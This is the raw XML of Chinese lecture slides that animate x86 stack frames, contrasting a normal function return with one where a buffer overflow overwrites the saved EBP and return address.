                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>压</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，压返回地址；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</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fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>压</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>基址指针值，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>同时将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</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fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>压局部变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076056"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31" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7007920"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32" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076056" y="198807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buffer_b</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8316416" y="5045114"/>
            <a:ext cx="1110685"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35" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8130958" y="3024108"/>
            <a:ext cx="329474"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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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28514562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416 -0.00255 L -0.00416 -0.07586 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3677"/>
                                    </p:animMotion>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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00416 -0.07586 L -0.00416 -0.1494 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3677"/>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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00416 -0.1494 L -0.00416 -0.22271 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3677"/>
                                    </p:animMotion>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4" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="4" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.22291 L -0.00417 -0.29629 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>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2.77778E-6 -4.81481E-6 L -0.1724 -0.28587 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-8628" y="-14306"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="83" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="84" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" grpId="2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="87" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="25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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="10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5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetID="64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="5" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.29629 L -0.00417 -0.3699 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>
                                    </p:animMotion>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additive="base">
                                        <p:cTn id="113" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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4" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="6" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.3699 L -0.00417 -0.44328 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>
                                    </p:animMotion>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="7" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.44328 L -0.00417 -0.51689 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>
                                    </p:animMotion>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8" grpId="0"/>
      <p:bldP spid="18" grpId="1"/>
      <p:bldP spid="18" grpId="2"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" uiExpand="1" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="34" grpId="1"/>
      <p:bldP spid="34" grpId="2"/>
      <p:bldP spid="34" grpId="3"/>
      <p:bldP spid="34" grpId="4"/>
      <p:bldP spid="34" grpId="5"/>
      <p:bldP spid="34" grpId="6"/>
      <p:bldP spid="34" grpId="7"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="35" grpId="1"/>
    </p:bld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14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>244</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正常函数返回流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2163558" y="246692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buffer_a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2163558" y="297175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EBP(main)</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返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>ret</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4097034" y="5045114"/>
            <a:ext cx="1308497"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EBP(m)</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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2165171" y="1988071"/>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buffer_b</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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4107774" y="3532946"/>
            <a:ext cx="1308497"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rPr>
              <a:t>IP = ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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93238013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0208 0.00232 L 0.00208 0.07561 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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0.00208 0.07561 L 0.00208 0.1489 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertic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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00208 0.14891 L 0.00208 0.21203 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="2" presetClass="exit" presetSubtype="6" fill="hold" grpId="0" nodeType="after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1+ppt_w/2"/>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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="after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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00208 0.21203 L 0.00208 0.27492 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>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grpId="0"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1+ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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2" grpId="0"/>
      <p:bldP spid="15" grpId="0"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="17" grpId="1"/>
      <p:bldP spid="17" grpId="2"/>
      <p:bldP spid="17" grpId="3"/>
      <p:bldP spid="19" grpId="0"/>
    </p:bldLst>
  </p:timing>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返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="200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245</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出函数返回流程</a:t>
            </a:r>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6451203" y="3140968"/>
            <a:ext cx="2520280"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EBP(m)=k3???</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6444208" y="3579703"/>
            <a:ext cx="2304256"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rPr>
              <a:t>IP = k4???</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman"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buffer_b</a:t>
            </a:r>
